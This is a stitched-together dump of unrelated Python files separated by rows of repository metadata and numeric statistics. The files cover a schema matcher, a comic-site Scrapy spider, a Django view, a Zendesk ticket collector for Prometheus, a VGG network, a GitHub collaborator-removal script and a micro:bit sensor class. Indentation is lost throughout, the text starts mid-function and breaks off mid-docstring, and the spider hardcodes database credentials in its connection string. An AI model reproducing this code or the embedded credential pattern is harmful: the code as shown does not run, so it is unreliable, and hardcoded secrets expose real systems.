names.append(('class', cl))
tfidf = da.get_tfidf_docs(docs)
et = time.time()
print("Time to create docs and TF-IDF: ")
print("Create docs and TF-IDF: {0}".format(str(et - st)))
num_features = tfidf.shape[1]
new_index_engine = LSHRandomProjectionsIndex(num_features, projection_count=7)
# N2 method
"""
clean_matchings = []
for i in range(len(docs)):
for j in range(len(docs)):
sparse_row = tfidf.getrow(i)
dense_row = sparse_row.todense()
array_i = dense_row.A[0]
sparse_row = tfidf.getrow(j)
dense_row = sparse_row.todense()
array_j = dense_row.A[0]
sim = np.dot(array_i, array_j.T)
if sim > 0.5:
if names[i][0] != names[j][0]:
match = names[i][1], names[j][1]
clean_matchings.append(match)
return clean_matchings
"""
# Index vectors in engine
st = time.time()
for idx in range(len(docs)):
sparse_row = tfidf.getrow(idx)
dense_row = sparse_row.todense()
array = dense_row.A[0]
new_index_engine.index(array, idx)
et = time.time()
print("Total index text: " + str((et - st)))
# Now query for similar ones:
raw_matchings = defaultdict(list)
for idx in range(len(docs)):
sparse_row = tfidf.getrow(idx)
dense_row = sparse_row.todense()
array = dense_row.A[0]
N = new_index_engine.query(array)
if len(N) > 1:
for n in N:
(data, key, value) = n
raw_matchings[idx].append(key)
et = time.time()
print("Find raw matches: {0}".format(str(et - st)))
# Filter matches so that only relation-class ones appear
clean_matchings = []
for key, values in raw_matchings.items():
key_kind = names[key][0]
for v in values:
v_kind = names[v][0]
if v_kind != key_kind:
match = (names[key][1], names[v][1])
clean_matchings.append(match)
return clean_matchings
def find_sem_coh_matchings(network, kr_handlers):
matchings = []
matchings_special = []
# Get all relations with groups
table_groups = dict()
for db, t, attrs in SS.read_table_columns(None, network=network):
groups = SS.extract_cohesive_groups(t, attrs)
table_groups[(db, t)] = groups # (score, [set()])
names = []
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('class', (kr_name, original_cl_name), svs))
for db_table_info, groups in table_groups.items():
db_name, table_name = db_table_info
class_seen = [] # to filter out already seen classes
for g_score, g_tokens in groups:
g_svs = []
for t in g_tokens:
sv = glove_api.get_embedding_for_word(t)
if sv is not None:
g_svs.append(sv)
for _, class_info, class_svs in names:
kr_name, class_name = class_info
sim = SS.compute_semantic_similarity(class_svs, g_svs)
if sim > g_score and class_name not in class_seen:
class_seen.append(class_name)
match = ((db_name, table_name, "_"), (kr_name, class_name))
matchings.append(match)
"""
similar = SS.groupwise_semantic_sim(class_svs, g_svs, 0.7)
if similar:
class_seen.append(class_name)
match = ((db_name, table_name, "_"), (kr_name, class_name))
matchings_special.append(match)
continue
"""
return matchings, table_groups #, matchings_special
cutoff_likely_match_threshold = 0.4
min_relevance_score = 0.2
scoring_threshold = 0.4
min_classes = 50
def find_hierarchy_content_fuzzy(kr_handlers, store):
matchings = []
# access class names, per hierarchical level (this is one assumption that makes sense)
for kr_name, kr in kr_handlers.items():
ch = kr.class_hierarchy
for ch_name, ch_classes in ch:
if len(ch_classes) < min_classes: # do this only for longer hierarchies
continue
# query elastic for fuzzy matches
matching_evidence = defaultdict(int)
for class_id, class_name in ch_classes:
matches = store.fuzzy_keyword_match(class_name)
keys_in_matches = set()
for m in matches:
# record
if m.score > min_relevance_score:
key = (m.db_name, m.source_name, m.field_name)
keys_in_matches.add(key)
for k in keys_in_matches:
matching_evidence[k] += 1
num_classes = len(ch_classes)
num_potential_matches = len(matching_evidence.items())
cutoff_likely_match = float(num_potential_matches/num_classes)
if cutoff_likely_match > cutoff_likely_match_threshold: # if passes cutoff threshold then
continue
sorted_matching_evidence = sorted(matching_evidence.items(), key=operator.itemgetter(1), reverse=True)
# a perfect match would score 1
for key, value in sorted_matching_evidence:
score = float(value/num_classes)
if score > scoring_threshold:
match = (key, (kr_name, ch_name))
matchings.append(match)
else:
break # orderd, so once one does not comply, no one else does...
return matchings
if __name__ == "__main__":
print("Matcher lib")
st = SimpleTrie()
sequences = [["a", "b", "c", "d"], ["a", "b", "c", "v"], ["a", "b", "c"], ["a", "b", "c", "lk"]]
root = st.add_sequences(sequences)
print(root)
| 40.825758 | 128 | 0.618148 | 3,401 | 26,945 | 4.598941 | 0.097912 | 0.040279 | 0.029538 | 0.020459 | 0.689981 | 0.649575 | 0.629435 | 0.616329 | 0.589732 | 0.530145 | 0 | 0.011198 | 0.284134 | 26,945 | 659 | 129 | 40.887709 | 0.799679 | 0.070069 | 0 | 0.555777 | 0 | 0 | 0.021567 | 0 | 0 | 0 | 0 | 0.001517 | 0 | 1 | 0.037849 | false | 0 | 0.023904 | 0.001992 | 0.111554 | 0.01992 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb3cf7dfd698c8727e5eccdcdcd702e3c271a0e | 3,034 | py | Python | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
import requests
import pymongo
import time
import re
from datetime import datetime
from details.items import DetailsItem
class TruyenqqSpider(scrapy.Spider):
name = 'truyenqq'
# allowed_domains = ['truyenqq.com']
# start_urls = ['http://truyenqq.com/']
client = pymongo.MongoClient("mongodb+srv://vncomics:vncomics@cluster0-6ulnw.mongodb.net/vncomics?retryWrites=true&w=majority")
db = client.vncomics
comics = db.comics
def get_url(self):
while True:
row = self.comics.find_one({"body": {"$exists": False}, "referer": self.name})
if row:
resp = requests.head(row['url'])
if resp.status_code == 404:
self.comics.delete_one({"_id": row['_id']})
else:
return row
else:
return None
pass
def start_requests(self):
self.row = self.get_url()
if self.row:
yield scrapy.Request(url=self.row['url'], callback=self.parse)
pass
def parse(self, response):
item_altName = None
item_body = response.css('.main-content .center .story-detail-info').extract_first()
item_body = re.sub(r'<(.*?)>', '', item_body).strip()
item_status = response.css('.main-content .center .txt .info-item:nth-child(2)::text').extract_first()
if item_status == "Tình trạng: Đang Cập Nhật":
item_status = 0
else:
item_status = 1
item_categories = response.css('.main-content .center .list01 li a::text').getall()
item_authors = response.css('.main-content .center .txt .info-item:nth-child(1) a::text').getall()
item_chapterNames = response.css('.main-content .works-chapter-list .row a::text').getall()
item_chapterUrls = response.css('.main-content .works-chapter-list .row a::attr(href)').getall()
for sp01 in response.css('.main-content .center .txt div .sp01'):
if sp01.css('.fa-heart'):
item_followed = int(sp01.css('.sp02::text').extract_first().replace(',', ''))
if sp01.css('.fa-eye'):
item_viewed = int(sp01.css('.sp02::text').extract_first().replace(',', ''))
item_updatedAt = None
obj = DetailsItem(
comicId=self.row['_id'],
name=self.row['name'],
altName=item_altName,
body=item_body,
status=item_status,
categories=item_categories,
authors=item_authors,
chapterNames=item_chapterNames,
chapterUrls=item_chapterUrls,
viewed=item_viewed,
followed=item_followed,
updatedAt=item_updatedAt,
referer=self.name
)
yield obj
# next url
time.sleep(3)
self.row = self.get_url()
if self.row:
yield scrapy.Request(url=self.row['url'], callback=self.parse)
pass
| 35.27907 | 131 | 0.575808 | 351 | 3,034 | 4.860399 | 0.356125 | 0.032825 | 0.061547 | 0.09027 | 0.290152 | 0.257327 | 0.239156 | 0.239156 | 0.19578 | 0.146542 | 0 | 0.013432 | 0.288398 | 3,034 | 85 | 132 | 35.694118 | 0.776748 | 0.033949 | 0 | 0.173913 | 0 | 0.028986 | 0.185578 | 0.050239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.043478 | 0.101449 | 0 | 0.246377 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb4934e053b5ee79225aaffff2965e5f1acee34 | 1,902 | py | Python | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | 2 | 2017-06-11T16:41:48.000Z | 2017-06-14T00:32:27.000Z | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | 13 | 2020-02-11T21:33:40.000Z | 2022-03-11T23:12:16.000Z | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from django.shortcuts import get_object_or_404, render
from django.views.generic import View
from django.core.paginator import Paginator
from article.models import Category, Post
from article.utils import get_page_num_list
class ArticleListView(View):
"""
分类文章列表View
"""
def get(self, request, slug, page=None):
# 第1步:先获取到当前分类
category = get_object_or_404(Category, slug=slug)
# 第2步:获取分类的所有文章
# 博客文章分类,只设置了2级,没有多级的,所以不需要对sub_category再次进行取子集
# sub_categories = category.category_set.all()
sub_categories = category.subs.all()
# 超级用户可以查看所有文章【包含删除的】
if request.user.is_superuser:
all_posts = Post.objects.filter(category=category)
# 联合sub_category的文章
if sub_categories:
sub_posts = Post.objects.filter(category__in=sub_categories)
# 文章只能有一个分类,所以不会取到重复对象的
all_posts = all_posts.union(sub_posts)
else:
all_posts = Post.published.filter(category=category)
# 联合sub_category的文章
if sub_categories:
sub_posts = Post.objects.filter(category__in=sub_categories)
# 文章只能有一个分类,所以不会取到重复对象的
all_posts = all_posts.union(sub_posts)
# 文章倒序排列,最新的文章放前面
all_posts = all_posts.order_by("-id")
if page:
page_num = int(page)
else:
page_num = 1
p = Paginator(all_posts, 10)
posts = p.page(page_num)
page_count = p.num_pages
# 获取分页器的页码列表,得到当前页面最近的7个页码列表
page_num_list = get_page_num_list(page_count, page_num, 7)
content = {
'posts': posts,
'category': category,
'last_page': page_count,
'page_num_list': page_num_list
}
return render(request, 'article/list.html', content)
| 31.7 | 76 | 0.615668 | 215 | 1,902 | 5.186047 | 0.381395 | 0.056502 | 0.049327 | 0.059193 | 0.283408 | 0.269058 | 0.269058 | 0.269058 | 0.269058 | 0.269058 | 0 | 0.011244 | 0.298633 | 1,902 | 59 | 77 | 32.237288 | 0.824588 | 0.154048 | 0 | 0.228571 | 0 | 0 | 0.034766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.142857 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb7dcb6bea70b57e941c03e794281139890eb69 | 5,739 | py | Python | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | import argparse
import yaml
import logging
import os
import sys
import time
from schema import Schema, SchemaError
import requests
from prometheus_client import CollectorRegistry, Gauge, push_to_gateway
from apscheduler.schedulers.background import BlockingScheduler
class Config(object):
def __init__(self):
# Set up config path
self.config_data = None
self.config_file = os.path.dirname(os.path.realpath(__file__)) + "/config/config.yml"
def load(self, check=True):
with open(self.config_file, 'r') as stream:
try:
self.config_data = yaml.safe_load(stream)
except yaml.YAMLError as e:
print('Configuration file can not be parsed. Error: {e}')
if check:
self.check()
return self.config_data
def check(self):
# Expected model of the schema of the config
config_schema = Schema({
'pushgateway': {
'host': str,
'job': {
'zendesk-ticket-count': {
'interval': int
}
}
},
'zendesk-ticket-count': {
'base_url': str,
'search_api': str,
'zendesk_api_user': str,
'zendesk_api_token': str,
'filter': {
'status': list,
'tag': list
}
}
})
try:
config_schema.validate(self.config_data)
except SchemaError as e:
logging.error(f'Configuration schema is not valid. {e}')
sys.exit()
else:
logging.debug('Configuration schema is valid')
class ZendeskApi(object):
def __init__(self, zendesk_config):
self.api_url = zendesk_config['base_url'] + zendesk_config['search_api']
self.user = zendesk_config['zendesk_api_user']
self.token = zendesk_config['zendesk_api_token']
self.filter = zendesk_config['filter']
def get(self, params):
logging.info(f'GET "{self.api_url}" with params "{params}"')
response = requests.get(self.api_url, params=params, auth=(self.user + "/token", self.token))
try:
response.raise_for_status()
except requests.HTTPError as e:
logging.error(f'Response HTTP code - "{response.status_code}". Content - {e.response.content}')
else:
logging.info(f"API responded in {response.elapsed.total_seconds()} seconds")
return response.json()
def load(self):
data = {}
for tag in self.filter['tag']:
data.update({tag: {}})
for status in self.filter['status']:
request_data = self.get({'query': f'type:ticket tags:{tag} status:{status}'})
data[tag].update({status: request_data['count']})
return data
class Pushgateway(object):
def __init__(self, host, job_name, data):
# init registry
self.registry = CollectorRegistry()
self.pushgateway_host = host
self.job_name = job_name
self.ticket_status_g = Gauge(
"zendesk_tickets_status",
"Zendesk ticket status",
["tag", "status"],
registry=self.registry,
)
for tag in data:
for status in data[tag]:
self.ticket_status_g.labels(tag=tag, status=status).set(data[tag][status])
def push(self):
try:
logging.info(f'Sending data to Prometheus host: "{self.pushgateway_host}", job - "{self.job_name}"')
push_start_time = time.time()
push_to_gateway(self.pushgateway_host, job=self.job_name, registry=self.registry)
push_end_time = time.time()
push_duration = push_end_time - push_start_time
logging.info(f"Successfully sent data to Prometheus. Time taken - {push_duration} seconds")
except Exception as e:
logging.error(f"Failed to send data to Prometheus. Msg - {e}")
def log_level_switch(log_level):
return dict(error=logging.ERROR, info=logging.INFO, debug=logging.DEBUG)[log_level]
def zendesk_ticket_count(config_data):
logging.info('Job has been started')
start = time.time()
zendesk_ticket_count_data = ZendeskApi(config_data['zendesk-ticket-count']).load()
Pushgateway(config_data['pushgateway']['host'], 'zendesk-ticket-count', zendesk_ticket_count_data).push()
logging.info(f"Job has finished in {time.time() - start} seconds")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Prometheus collector for zendesk ticket status based on tag"
)
parser.add_argument(
"-l",
"--log-level",
type=str,
required=False,
default="info",
help="default info [error, info, debug]",
)
args = parser.parse_args()
logging.basicConfig(level=log_level_switch(args.log_level))
logging.info("Loading configuration")
config_data = Config().load()
logging.info("Configuration has been loaded successfully")
# init scheduler
scheduler = BlockingScheduler()
# configure scheduler
# zendesk-ticket-count
schedule_id = 'zendesk-ticket-count'
schedule_name = 'zendesk-ticket-count'
schedule_interval = config_data['pushgateway']['job'][schedule_name]['interval']
logging.info(f'Scheduling "{schedule_id}", will be run every {schedule_interval} seconds')
scheduler.add_job(
zendesk_ticket_count,
'interval',
[config_data],
seconds=schedule_interval,
id='schedule_id',
)
# start scheduler
scheduler.start()
| 33.758824 | 112 | 0.605855 | 653 | 5,739 | 5.136294 | 0.249617 | 0.050388 | 0.059034 | 0.015206 | 0.051282 | 0.019678 | 0.019678 | 0 | 0 | 0 | 0 | 0 | 0.282628 | 5,739 | 169 | 113 | 33.95858 | 0.814671 | 0.025614 | 0 | 0.058394 | 0 | 0 | 0.228551 | 0.019165 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072993 | false | 0 | 0.072993 | 0.007299 | 0.19708 | 0.007299 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb9142eb89bd3dd107533c878c67b880a33eb33 | 501 | py | Python | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | 1 | 2022-02-16T08:25:53.000Z | 2022-02-16T08:25:53.000Z | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | null | null | null | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | null | null | null | import json
import os
f = open('ntu_mods.json', "r")
mod_json = json.loads(f.read())
filtered_dict = {}
count = 0
for course in mod_json['COURSES']:
if "CE" in course['COURSE']:
filtered_dict = course
count += 1
path = os.path.abspath("./courses/" + course['COURSE'] + ".json")
with open(path, "w") as outfile:
json.dump(filtered_dict, outfile)
outfile.close()
filtered_dict = {}
print("Number of CE courses filtered:",count)
| 25.05 | 73 | 0.590818 | 66 | 501 | 4.378788 | 0.5 | 0.16609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005376 | 0.257485 | 501 | 19 | 74 | 26.368421 | 0.771505 | 0 | 0 | 0.125 | 0 | 0 | 0.161677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbc03dd34b0d6ae5babb01f31f01fe13fbcb7bf | 2,545 | py | Python | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | null | null | null | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | 2 | 2020-12-04T07:28:01.000Z | 2022-02-27T03:07:59.000Z | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | null | null | null | """VGG11/13/16/19 in Pytorch."""
import torch
import torch.nn as nn
cfg = {
'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
class VGG(nn.Module):
def __init__(self, vgg_name, input_shape=224, num_classes=1000, batch_norm=False, init_weights=True):
super(VGG, self).__init__()
self.features = self._make_layers(cfg[vgg_name], batch_norm=batch_norm)
self.classifier = nn.Sequential(
nn.Linear(512 * int(input_shape/2**5) * int(input_shape/2**5), 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, num_classes),
)
if init_weights:
self._initialize_weights()
def forward(self, x):
out = self.features(x)
out = out.view(out.size(0), -1)
out = self.classifier(out)
return out
def _make_layers(self, cfg, batch_norm=False):
layers = []
in_channels = 3
for m in cfg:
if m == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, m, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(m), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = m
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
def vgg16(input_shape, num_classes, batch_norm=False):
return VGG('VGG16', input_shape, num_classes, batch_norm=batch_norm, init_weights=True)
| 37.985075 | 117 | 0.539882 | 349 | 2,545 | 3.790831 | 0.246418 | 0.063492 | 0.042328 | 0.030234 | 0.322751 | 0.29932 | 0.281179 | 0.195011 | 0.188964 | 0.157218 | 0 | 0.116883 | 0.304126 | 2,545 | 66 | 118 | 38.560606 | 0.630152 | 0.010216 | 0 | 0.160714 | 0 | 0 | 0.022682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089286 | false | 0 | 0.035714 | 0.017857 | 0.196429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbce0ad3c838fa381d3b09478b10889eda211b9 | 841 | py | Python | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 9 | 2016-04-04T07:13:02.000Z | 2021-11-08T12:15:33.000Z | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 1 | 2020-04-12T18:44:26.000Z | 2020-04-12T18:44:26.000Z | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 2 | 2019-02-25T13:54:55.000Z | 2020-04-07T14:00:36.000Z | from typing import Dict
class FuncDesc:
def __init__(self,
func_name:str,
type_by_arg:Dict[str, str],
output_ty:str):
self.name = func_name
self.output_ty = output_ty
self.ordered_argname_type_pairs = sorted(list(type_by_arg.items()),
key=lambda t_a: str(t_a[0]))
def __str__(self):
return '<name: {name}, inputs: {inputs}, output: {output}>'.format(
name=self.name,
inputs=str(self.ordered_argname_type_pairs),
output=self.output_ty
)
def __eq__(self, other):
if not isinstance(other, FuncDesc):
return False
return str(other) == str(self)
def __hash__(self):
return hash(str(self))
__repr__ = __str__
| 28.033333 | 77 | 0.546968 | 99 | 841 | 4.222222 | 0.393939 | 0.083732 | 0.043062 | 0.105263 | 0.129187 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001832 | 0.350773 | 841 | 29 | 78 | 29 | 0.763736 | 0 | 0 | 0 | 0 | 0 | 0.059453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.086957 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbd5acd96c506ff895add5fd69efd97917904ed | 1,001 | py | Python | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 32 | 2021-01-27T17:43:23.000Z | 2022-03-23T18:00:41.000Z | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 12 | 2021-01-26T18:14:59.000Z | 2021-10-04T12:24:41.000Z | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 11 | 2021-01-28T13:54:24.000Z | 2022-03-16T12:16:27.000Z | #!/usr/bin/python3
import requests
import json
def run(token, username, repository, collaborator):
url = f"https://api.github.com/repos/{username}/{repository}/collaborators/{collaborator}"
authorization = f"token {token}"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization" : authorization,
}
r1 = requests.get(
url=url,
headers=headers
)
if r1.status_code == 204:
r2 = requests.delete(
url=url,
headers=headers
)
if r2.status_code == 204:
print(f"✅ Collaborator \033[36m{collaborator}\033[0m successfully removed from {username}'s \033[36m{repository}\033[0m repository")
else:
print("❌ Couldn't delete the collaborator from the repository")
print (r2.status_code, r2.reason)
else:
print(f"⚠️ Username \033[36m{collaborator}\033[0m isn't a \033[36m{repository}\033[0m repository collaborator")
| 27.805556 | 144 | 0.613387 | 118 | 1,001 | 5.211864 | 0.440678 | 0.039024 | 0.042276 | 0.065041 | 0.247154 | 0.100813 | 0 | 0 | 0 | 0 | 0 | 0.067568 | 0.260739 | 1,001 | 35 | 145 | 28.6 | 0.758108 | 0.016983 | 0 | 0.24 | 0 | 0.08 | 0.427263 | 0.144456 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.08 | 0 | 0.12 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbd63f55e42c79ca4727c69d8e64efe299a4827 | 1,281 | py | Python | simulator/src/files/util.py | larashores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | 1 | 2019-05-16T12:50:03.000Z | 2019-05-16T12:50:03.000Z | simulator/src/files/util.py | vinceshores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | null | null | null | simulator/src/files/util.py | vinceshores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | 1 | 2021-03-02T14:44:36.000Z | 2021-03-02T14:44:36.000Z | from files.datafile import DataFile
import glob
import os
import sys
def read_data(file_name):
with open(file_name, 'rb') as file:
data, index = DataFile.from_bytes(bytearray(file.read()))
return data.get()
def write_data(file_name, data):
data_file = DataFile()
data_file.set(type(data), data)
with open(file_name, 'wb') as file:
file.write(data_file.to_bytes())
def get_single_file_name(*extensions):
if len(sys.argv) == 1:
files = []
for ext in extensions:
files.extend(glob.iglob('data/*.'+ext))
return max(files, key=os.path.getctime)
elif len(sys.argv) == 2:
return os.path.join('data', sys.argv[1])
else:
raise TypeError('Usage: [filename]')
def get_all_file_names(*extensions):
if len(sys.argv) == 1:
files = []
for ext in extensions:
files.extend(glob.iglob('data/*.' + ext))
return files
def data_desc(data):
info = data.run_info
return (f'rows: {info.rows}\n' +
f'cols: {info.cols}\n' +
f'L: {info.spring_length}\n' +
f'v: {info.plate_velocity}\n' +
f'a: {info.alpha}\n' +
f'l: {info.l}\n' +
f'dt: {info.time_interval}')
| 25.62 | 65 | 0.571429 | 179 | 1,281 | 3.96648 | 0.385475 | 0.016901 | 0.042254 | 0.04507 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0 | 0.004334 | 0.279469 | 1,281 | 49 | 66 | 26.142857 | 0.764897 | 0 | 0 | 0.210526 | 0 | 0 | 0.153005 | 0.035129 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbdc792215a8ce6952b1d5568327d6cf71b3813 | 845 | py | Python | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | 2 | 2020-08-06T07:32:57.000Z | 2022-02-11T02:37:21.000Z | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | null | null | null | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | 1 | 2021-09-11T02:34:39.000Z | 2021-09-11T02:34:39.000Z | from microbit import *
from enum import *
class PIR(object):
"""基本描述
人体红外检测, 运动检测
Args:
RJ_pin (pin): 连接端口
"""
def __init__(self, RJ_pin):
if RJ_pin == J1:
self.__pin = pin8
elif RJ_pin == J2:
self.__pin = pin12
elif RJ_pin == J3:
self.__pin = pin14
elif RJ_pin == J4:
self.__pin = pin16
def PIR_is_decection(self) -> bool:
"""基本描述
检测到人体或者运动
Returns:
boolean: 检测到返回True, 未检测返回False
"""
